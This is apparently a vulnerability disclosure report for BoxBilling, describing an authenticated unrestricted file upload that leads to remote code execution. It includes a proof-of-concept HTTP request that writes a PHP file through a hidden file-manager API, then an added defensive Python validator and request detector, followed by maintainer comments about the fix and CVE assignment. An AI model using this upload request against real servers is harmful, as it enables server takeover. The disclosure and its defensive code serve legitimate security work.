BoxBilling <=4.22.1.5 - Authenticated Unrestricted File Upload - RCE in boxbilling/boxbilling
Reported on
Sep 18th 2022
Description
BoxBilling was vulnerable to Unrestricted File Upload. To exploit the vulnerability, an attacker must have a valid authenticated admin session on the CMS. With at least one product order present, the attacker can upload a file containing a webshell through a hidden API endpoint and gain RCE.
Proof of Concept
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
Video PoC:
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
Impact
An attacker can compromise the server by uploading the malicious file, and the vulnerability can be chained with other vulnerabilities (XSS, CSRF).
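As an added example (not code from the report, nor from BoxBilling itself), the following Python shows the two defensive controls a practitioner would want around a "save file" endpoint like the one in the PoC: a path validator that canonicalises the requested path under a fixed base directory and refuses executable suffixes (it would have rejected `path=ax.php`), and an audit routine that flags a captured request with the shape shown above, usable in a proxy log review or as a pre-save check. The endpoint string and the sample body come from the PoC; the base directory, the extension deny-list, the helper names and the second sample request are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlparse

# The endpoint named in the report's PoC.
SAVE_FILE_ENDPOINT = "/api/admin/Filemanager/save_file"

# Constructed deny-list: suffixes a web server may execute or honour as
# configuration. Extend to match the server's handler mapping.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar",
    "phps", "inc", "htaccess",
}

PHP_OPEN_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def has_executable_extension(filename: str) -> bool:
    """Reject any dot-separated suffix in the deny-list. Checking every
    suffix, not just the last one, also catches double extensions such as
    'shell.php.txt' and dotfiles such as '.htaccess'."""
    suffixes = filename.lower().split(".")[1:]
    return any(s in EXECUTABLE_EXTENSIONS for s in suffixes)


def resolve_save_path(base_dir: str, user_path: str):
    """Return the absolute on-disk path for user_path if it stays inside
    base_dir and carries no executable extension, otherwise None.

    realpath() is applied before the prefix check so '..' segments and
    symlinks cannot escape the base; comparing against base + os.sep stops
    '/srv/uploads2' from matching a base of '/srv/uploads'."""
    if not user_path or "\x00" in user_path or os.path.isabs(user_path):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if not candidate.startswith(base + os.sep):
        return None
    if has_executable_extension(os.path.basename(candidate)):
        return None
    return candidate


def audit_save_file_request(url: str, body: str) -> list:
    """Inspect one request (URL plus urlencoded body) for the pattern in the
    report. Returns the list of finding names; an empty list means the
    request did not target the endpoint or showed nothing suspicious."""
    query = parse_qs(urlparse(url).query)
    if query.get("_url", [""])[0] != SAVE_FILE_ENDPOINT:
        return []
    params = parse_qs(body, keep_blank_values=True)
    path = params.get("path", [""])[0]
    data = params.get("data", [""])[0]
    findings = []
    if has_executable_extension(os.path.basename(path)):
        findings.append("executable_extension")
    if os.path.isabs(path) or ".." in path.replace("\\", "/").split("/"):
        findings.append("path_traversal")
    if PHP_OPEN_TAG.search(data):
        findings.append("php_code_in_data")
    return findings


# Sample request reconstructed from the PoC in the report.
SAMPLE_URL = "/index.php?_url=/api/admin/Filemanager/save_file"
SAMPLE_BODY = "order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>"

if __name__ == "__main__":
    # Constructed base directory; any directory outside the web root works.
    print(audit_save_file_request(SAMPLE_URL, SAMPLE_BODY))
    print(resolve_save_path("/srv/boxbilling/uploads", "ax.php"))
    print(resolve_save_path("/srv/boxbilling/uploads", "notes/readme.txt"))
```

The validator is the part that removes the class of bug: even an authenticated admin cannot write a server-executable file, and the write is confined to a directory that the web server should be configured not to execute from. The audit routine is a detection aid only; as the maintainers note in the thread, removing the file manager module entirely is the stronger fix.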
Great work @zetc0de 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Timothy, we’ve already dealt with this and removed the problematic module entirely in 2021. It was resolved when you didn’t care about the project.
https://github.com/boxbilling/boxbilling/pull/932
Have a nice day.
Sorry for my late reply to the comment update, since the comments section does not send email notifications. Sounds good for the community to work on making boxbilling more secure. The root cause of the vulnerability was described; based on the vulnerability description, the team can mitigate the risk by reducing the attack vector for a successful exploit.
Have a good day!
@admin, can you disclose this report? Also, can you assign a CVE for this vulnerability?
Yağızhan (evrifaessa), at your convenience please publish this report per the request of zetc0de, who commented 4 hours ago and is the researcher of this disclosure.
@admin, can you disclose this report? Also, can you assign a CVE for this vulnerability?
Thanks and have a nice day.
This report has now been assigned a CVE and it should publish momentarily as requested :)